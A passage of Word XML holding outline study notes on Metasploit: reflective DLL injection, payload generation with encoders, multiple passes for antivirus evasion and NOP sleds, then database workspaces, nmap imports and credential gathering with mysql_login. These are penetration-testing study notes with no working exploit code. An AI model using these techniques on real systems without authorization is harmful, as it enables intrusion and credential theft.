      <w:r>
        <w:t>function on IPv6 networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600196EA" w14:textId="12761437" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Reflective DLL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F247BD" w14:textId="08EB6F88" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>stage payload is injected into a compromised host process running in memory, doesn’t touch hard drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2271D9" w14:textId="31693E68" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>VNC and Meterpreter both use this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BE031" w14:textId="406DFB25" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Generating Payloads in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56487E2D" w14:textId="34FC9627" w:rsidR="0066600F" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Generate A Payload for Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59191F5F" w14:textId="36C4A91C" w:rsidR="00D46F20" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>when “use”-ing a payload, Metasploit adds generate, pry, and reload commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319862C7" w14:textId="09765045" w:rsidR="00D46F20" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>generate assists in generating shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF20A0F" w14:textId="44550DDC" w:rsidR="00D46F20" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-b ‘&lt;byte&gt;‘ – removes bad bytes, such as the null byte (\x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E018512" w14:textId="2E0A1D1E" w:rsidR="00D46F20" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>too many restricted bytes prevents encoders from being selected to work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550BC4D0" w14:textId="407BA618" w:rsidR="00D46F20" w:rsidRDefault="00D46F20" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using an Encoder during Payload Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FBED5" w14:textId="5D63FF2D" w:rsidR="00D46F20" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>show encoders command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60415A48" w14:textId="23162854" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-e switch allows choice of encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415DE22" w14:textId="69BEBA8A" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-f switch allows saving of generated payload to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550727AF" w14:textId="702EE70D" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Generating Payloads with Multiple Passes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387426D0" w14:textId="6B1E5C6D" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>iteration switch (-i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CCABED" w14:textId="3ECC996D" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>how many encoding passes it must do before producing the final payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A26AD6F" w14:textId="34B2B2E0" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>stealth and AV evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46851B82" w14:textId="6A8F6E7A" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Generation Using a NOP Sled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E3CE0" w14:textId="19BE5C1C" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use -t switch to denote which language payload should be generated in (c, java, python, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E05AF1" w14:textId="5AA12A22" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>NOP is added with -s switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DA32EA" w14:textId="3C246760" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>followed by number of NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EA95C" w14:textId="0149EAD8" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>adds sled to beginning of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3228F" w14:textId="502294E7" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Databases in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7419A" w14:textId="55D037A6" w:rsidR="00BD1426" w:rsidRDefault="00BD1426" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Store Information in a Database Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3BA3D" w14:textId="2C08E1A5" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC533C8" w14:textId="3048215A" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>help database command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3449A4" w14:textId="5E011132" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using the Database in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9C89E" w14:textId="6296DA8A" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504AD65E" w14:textId="41AC9D65" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>systemctl start postgresql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F0F0D" w14:textId="29852F2C" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F7922" w14:textId="591BA379" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using Workspaces in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477E62C" w14:textId="08EC4EC4" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9661B5" w14:textId="194278E5" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>confirm successful connection to DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2624B34C" w14:textId="3226B9EB" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>workspace command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7490F" w14:textId="4514E093" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>asterisk denotes which workspace is currently selected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8322E" w14:textId="6528D208" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>change workspace by workspace &lt;workspace name&gt; command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E79CF" w14:textId="52D5065F" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-a switch creates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51624B05" w14:textId="25626CD8" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-d switch deletes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF6701D" w14:textId="773CFAA6" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-h switch lists capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968AE4F" w14:textId="3350004E" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Importing and Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F288203" w14:textId="5917A756" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>db_import &lt;path to file of nmap scan&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7B6694" w14:textId="0BE4F3EA" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>confirm import via hosts command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696DFEE5" w14:textId="212FA0EB" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can scan a host directly from console with db_nmap command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3D24D9" w14:textId="6B0DF280" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ex. db_nmap -A &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D0436" w14:textId="63CA81A0" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Backing Up Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBC3D8" w14:textId="49E8AAF4" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>db_export command to save to XML file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF326EE" w14:textId="2D25018C" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using Hosts Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB92854" w14:textId="43CDC35E" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>hosts command confirms presence of data in database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCB455" w14:textId="1216D3FD" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>hosts -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF3CE5" w14:textId="4F6E9CFE" w:rsidR="006E7E8E" w:rsidRDefault="006E7E8E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Setting Up Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189A0BF" w14:textId="5907A682" w:rsidR="006E7E8E" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-S option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158BB86C" w14:textId="4613B3CD" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ex. hosts -c addresses,os_flavor -S Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE5A380" w14:textId="7100357B" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-R command adds discovered IP to RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010B2E2" w14:textId="4568D754" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62199CBC" w14:textId="26F3B41E" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>services -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E51A49C" w14:textId="1CA2F911" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> specify fields to be displayed, uses with -S switch to particular string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339B6E7" w14:textId="1225A377" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>CSV Export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCC806" w14:textId="62D528E6" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-o switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268EE1B6" w14:textId="14B35881" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F571BC3" w14:textId="4485A15C" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>manage found and used credentials for targets in db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558C329E" w14:textId="75B47C2A" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>run mysql_login command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280C3F09" w14:textId="15D23DF2" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F391E" w14:textId="03F1D8A3" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010A487" w14:textId="55024F5F" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>test for possible login info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ABDEA1" w14:textId="625313FE" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>add to db with creds -a command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2832EE1D" w14:textId="5745FDA5" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33207FDB" w14:textId="76035E5A" w:rsidR="00DB7019" w:rsidRDefault="00DB7019" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
